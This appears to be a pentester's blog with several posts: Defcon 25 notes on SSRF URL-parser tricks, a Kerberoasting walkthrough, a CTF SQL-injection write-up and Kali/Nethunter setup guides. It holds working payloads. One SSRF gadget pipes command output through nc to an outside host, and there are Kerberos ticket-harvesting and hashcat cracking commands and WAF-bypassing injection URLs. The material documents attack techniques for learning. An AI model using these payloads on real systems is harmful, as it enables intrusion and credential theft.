Defcon 25 Takeaways

This July I had the pleasure of attending Defcon anniversary 25th time and these are my take-aways from the conference.

My goal when going to Defcon is to get inspired and motivated by the great work of others and to be able to incorporate new ideas and techniques into existing work. There is a myriad of great work being presented or taught at Defcon and it is overwhelming to take it all in. Especially when adding in the masses of people lining up and wandering around making a semi-introvert wanna crawl back into bed..

Notable presentations:

Orange Tsai - A new Era of Exploiting URL Parser in trending programming languages

This little gem presents techniques for finding and exploiting SSRF which are directly applicable in testing applications. Abusing the discrepancy between RFCs 2396 and 3986 in libraries Orange Tsai has found that many libraries are vulnerable to these tricks in different situations. This results in payloads like the following:

http://foo@evil.com:80@google.com/
http://hackallthethings.xyz/－＊/etc/passwd
http://hackallthethings.xyz/ＮＮ/etc/passwd

Note that the -* characters are actually unicode characters for %0d and %0a which break the NodeJS protection against CRLF injection.

python
>>> print(u'\uff0d')
－
>>> print(u'\uff0a')
＊
>>> print(u'\uff2e')
Ｎ

List of unicode characters here

Another example that abuses decimal support in gethostbyname() (RFC1035):

>>> print host
\o\r\a\n\g\e.t\w
>>> socket.gethostbyname(host)
'50.116.8.239'

Orange also chained SSRF to exploit internal services via protocol smuggling and libraries vulnerable to CRLF injection.

Example:

http://0:8000/composer/send_email
?to=orange@chroot.org&url=http://127.0.0.1:11211/%0D%0Aset%20githubproductionsearch/queries/code_query%3A857be82362ba02525cef496458ffb09cf30f6256%3Av3%3Acount%200%2060%20150%0D%0A%04%08o%3A%40ActiveSupport%3A%3ADeprecation%3A%3ADeprecatedInstanceVariableProxy%07%3A%0E%40instanceo%3A%08ERB%07%3A%09%40srcI%22%1E%60id%20%7C%20nc%20orange.tw%2012345%60%06%3A%06ET%3A%0C%40linenoi%00%3A%0C%40method%3A%0Bresult

There are tons of examples in this talk and I have yet to dig through them all and test them, but it’s definitely lots of stuff that will improve testing of SSRF and inspire new tricks and ideas.
Also there are some good references in this talk:
SSRF Bible

All content is available at the Defcon Media Server.

Installing ASUS AWUS036NHA on Windows 10

Due to shoddy WiFi in my office I had to setup my computer with another adapter to try to get some better signal.

If you are on Windows 10, going to "Device management" and clicking "Update driver" is all it takes to get the drivers for this adapter.

Just like this blog post from Alfa Networks says:
http://alfanetworkinc.blogspot.dk/2015/08/blog-post.html

Springtime Kerberoasting

After getting some motivation from recent talks I attended I have decided to do some Kerberoasting in our Windows domain.

There are lots of excellent articles out there such as Harmj0y’s article. In there you can find a bunch of references to other good and original articles on the subject.
The reason I’m writing this blog post is that there are lots of tools out there and some require specific versions of John the Ripper and so on so I decided to document one path that I have taken here.

First, on a domain joined Windows computer run the following script by Harmj0y:
https://gist.github.com/HarmJ0y/53a837fce877e32e18d78acbb08c8fe9

powershell -exec bypass

# Load the script
. ./Invoke-Kerberoast.ps1

# Do a test run to see 
# that it's working
Invoke-Kerberoast | fl 

# Get the tickets in John
# format and convert to CSV format
Invoke-Kerberoast -AdminCount -OutputFormat john | ConvertTo-Csv -NoTypeInformation | out-file kerbe
roasts.csv

The next step is to start cracking the tickets in Kirbi format that we obtained. We can use either John The Ripper or Hashcat. I decided on Hashcat as this can make use of the GPU with oclHashcat.

hashcat -a3 -m 13100 service_tickets_hashcat.txt rockyou.txt
hashcat -a3 -m 13100 service_tickets_hashcat.txt --show

Another option for doing this on a red team engagement is to use Powershell Empire’s module for it powershell/credentials/invoke-kerberoast.

Other tools and resources

https://github.com/nidem/kerberoast
https://room362.com/post/2016/kerberoast-pt1/
http://www.harmj0y.net/blog/activedirectory/targeted-kerberoasting/

Simplesqlin

The server runs openresty/1.11.2.2 according to the response headers.

Injection point is here:
http://202.120.7.203/index.php?id=1*

We can add or subtract or multiply numbers..

http://202.120.7.203/index.php?id=2-1
http://202.120.7.203/index.php?id=2%2b1
http://202.120.7.203/index.php?id=2*1

By doing order by we find the column number, which is 3. order by 4 gives a 500 error:

http://202.120.7.203/index.php?id=1%20order%20by%203--+

Anything else so far results in 500 errors.
There is a WAF blocking certain keywords. List of blocked keywords:
* SELECT
* FROM
* WHERE
* SLEEP

We can bypass the WAF by inserting a control character inside the keywords. Here we used %0b which is vertical tabulation.

http://202.120.7.203/index.php?id=2 uni%0bon+se%0blect 1,"a",3 order by 1--+

Other control characters that work in this case are:
* %0c
* %0E
* %0F
* %10 - %1f

So the WAF is relatively easily bypassed.

Now we need to find the table in which the flag is stored. Because I suck at remembering Mysql special tables and such I used a resource like this:

MySQL Injection Cheat Sheet

Then we do a query like this:

http://202.120.7.203/index.php?id=2 uni%0bon+se%1flect table_schema,table_name,1 FR%0bOM information_schema.tables WHE%0bRE table_schema != 'mysql' AND table_schema != 'information_schema' order by 3--+

To find that there is a table called flag, duh.

And we can also get the column name in a similar fashion:

http://202.120.7.203/index.php?id=2 uni%0bon+se%1flect table_schema,table_name,column_name FR%0bOM information_schema.columns WHE%0bRE table_schema != 'mysql' AND table_schema != 'information_schema' order by 3 LIMIT 1 OFFSET 1--+

And then finally we can get the flag by doing this query:

http://202.120.7.203/index.php?id=2 uni%0bon+se%1flect flag,1,2 FR%0bOM flag order by 3--+

flag{W4f_bY_paSS_f0R_CI}

Blogging via Stackedit

How to

Add this to the top of the document:

---
layout: post
title: Blogging via Stackedit
tags: stackedit, reallycoolstuff, ingenious
---

Settings

Choose format to be HTML

Test

This is just a test to try out blogging in Markdown via Stackedit!
Let’s try some code:

def test():
    for x in range(1000):
        print x 

Written with StackEdit.

Installing Kali Linux Nethunter on Nexus 7 (2013 Wifi)

To install Nethunter on the Nexus 7 (Wifi 2013) edition we first need to unlock the bootloader of the device and root it. There are many guides on the Internet on how to do this, but the best source I have found so far is the Offensive Secuirty Github repository: https://github.com/offensive-security/nethunter-LRT.

This repository contains a collection of scripts that help you install Kali Linux Nethunter on either a Nexus or OnePlusOne device. Their instructions are straightforward and their scripts are close to fully automated and work very well. It does require that you download a few things before using the scripts, but there are links that help you along.
The major advantage of these scripts over some other tools that I found is that they can run from Linux or OS X. First we must install Android Studio (or just binaries) to get ADB and fastboot. Next we must download and place the following into their respective folders in the cloned repo:

• Stock Android image 
• https://developers.google.com/android/images?hl=en#razor
• Team Win Root Project (TWRP)
• https://dl.twrp.me/flo/
• SuperSU binary by ChainFire
• http://download.chainfire.eu/752/SuperSU/BETA-SuperSU-v2.65-20151226141550.zip (this is the most shady part. I chose this as it was the only one that worker at the time)
• Kali Nethunter image
• https://www.offensive-security.com/kali-linux-nethunter-download/

Once these are in place we can go ahead and unlock the bootloader if it isn't already unlocked. Just run the script ./oemUnlock.sh.

Next we flash the stock Android image to have a clean device to install to. After installing, booting, setting up the device (manually),  we can run the script that installs the Custom Recovery from TWRP, sets up the SuperSU binary to maintain root and installs Kali Linux Nethunter. 

The last step requires us to select some things we want included in Kali Linux Nethunter, and then the intallation proceeds.

If everything was successful we will have a working Nethunter device and we can go hack. Happy hacking. 

Installing Kali Linux on Debian in DigitalOcean

DigitalOcean is a nice and relatively cheap way to run virtual machines in the cloud. As a pentester I like to use Kali Linux which comes with a great number of useful tools. The problem is that DigitalOcean does not have a Kali Linux droplet or a way of installing custom images, at least not to my knowledge. But since Kali Linux is based on Debian let's go ahead and try installing Kali Linux packages on top of the latest Debian image available from DigitalOcean.

We start by creating a droplet, I used the Debian 8.7 x64 distribution and if you are gonna run Kali Linux you should probably go with at least size number 2 which has 1gb of RAM at 10$/month.

Add an SSH key to the droplet, spin it up and login to the box.

Let's find the sources for the Kali Linux packages from here:
http://docs.kali.org/general-use/kali-linux-sources-list-repositories

I wanna use the latest Rolling distribution that gets updates continuously so I'll use:

deb http://http.kali.org/kali kali-rolling main contrib non-free

We add this to the /etc/apt/sources.list file on the system.

root@mybox:~# echo "deb http://http.kali.org/kali kali-rolling main contrib non-free" >> /etc/apt/sources.list

cat /etc/apt/sources.list
...

# jessie-updates, previously known as 'volatile'
deb http://mirrors.digitalocean.com/debian jessie-updates main
deb-src http://mirrors.digitalocean.com/debian jessie-updates main
deb http://http.kali.org/kali kali-rolling main contrib non-free

Next we need to import the GPG key for the sources so that we can verify the packages. I looked up the key from an existing Kali Linux installation:

root@aKaliBoxIhad:~# apt-key list --with-fingerprint
...
/etc/apt/trusted.gpg.d/kali-archive-keyring.gpg

-----------------------------------------------

pub   rsa4096 2012-03-05 [SC] [expires: 2018-02-02]

      44C6 513A 8E4F B3D3 0875  F758 ED44 4FF0 7D8D 0BF6

uid           [ unknown] Kali Linux Repository <devel@kali.org>

sub   rsa4096 2012-03-05 [E] [expires: 2018-02-02]

Next we add the key to the keychain by looking it up from keys.gnupg.net. Note: Do not use the short fingerprint!

root@mybox:~# apt-key adv --keyserver hkp://keys.gnupg.net --recv-keys ED444FF07D8D0BF6
Executing: gpg --ignore-time-conflict --no-options --no-default-keyring --homedir /tmp/tmp.T551SpCEIH --no-auto-check-trustdb --trust-model always --primary-keyring /etc/apt/trusted.gpg --keyring /etc/apt/trusted.gpg.d/debian-archive-jessie-automatic.gpg --keyring /etc/apt/trusted.gpg.d/debian-archive-jessie-security-automatic.gpg --keyring /etc/apt/trusted.gpg.d/debian-archive-jessie-stable.gpg --keyring /etc/apt/trusted.gpg.d/debian-archive-squeeze-automatic.gpg --keyring /etc/apt/trusted.gpg.d/debian-archive-squeeze-stable.gpg --keyring /etc/apt/trusted.gpg.d/debian-archive-wheezy-automatic.gpg --keyring /etc/apt/trusted.gpg.d/debian-archive-wheezy-stable.gpg --keyserver hkp://keys.gnupg.net --recv-keys 7D8D0BF6
gpg: requesting key 7D8D0BF6 from hkp server keys.gnupg.net
gpg: key 7D8D0BF6: public key "Kali Linux Repository " imported
gpg: Total number processed: 1
gpg:               imported: 1  (RSA: 1)

Now update the packages and let's look at which Kali Linux packages we can install:

root@mybox:~# apt-get update && apt-get upgrade

All the Kali Linux meta packages are listed here:

https://www.kali.org/news/kali-linux-metapackages/

So for instance to install the top 10 tools of Kali Linux, we do:

root@mybox:~# apt-get install kali-linux-top10

Now we will have for among other tools,  Metasploit, installed on the server. Let's start it up

root@mybox:~# /etc/init.d/postgresql start

root@mybox:~# msfdb init

root@mybox:~# msfconsole


                 _---------.
             .' #######   ;."
  .---,.    ;@             @@`;   .---,..
." @@@@@'.,'@@            @@@@@',.'@@@@ ".
'-.@@@@@@@@@@@@@          @@@@@@@@@@@@@ @;
   `.@@@@@@@@@@@@        @@@@@@@@@@@@@@ .'
     "--'.@@@  -.@        @ ,'-   .'--"
          ".@' ; @       @ `.  ;'
            |@@@@ @@@     @    .
             ' @@@ @@   @@    ,
              `.@@@@    @@   .
                ',@@     @   ;           _____________
                 (   3 C    )     /|___ / Metasploit! \
                 ;@'. __*__,."    \|--- \_____________/
                  '(.,...."/


Validate lots of vulnerabilities to demonstrate exposure
with Metasploit Pro -- Learn more on http://rapid7.com/metasploit

       =[ metasploit v4.13.14-dev                         ]
+ -- --=[ 1613 exploits - 915 auxiliary - 279 post        ]
+ -- --=[ 471 payloads - 39 encoders - 9 nops             ]
+ -- --=[ Free Metasploit Pro trial: http://r-7.co/trymsp ]

msf >

Now we can get hacking :D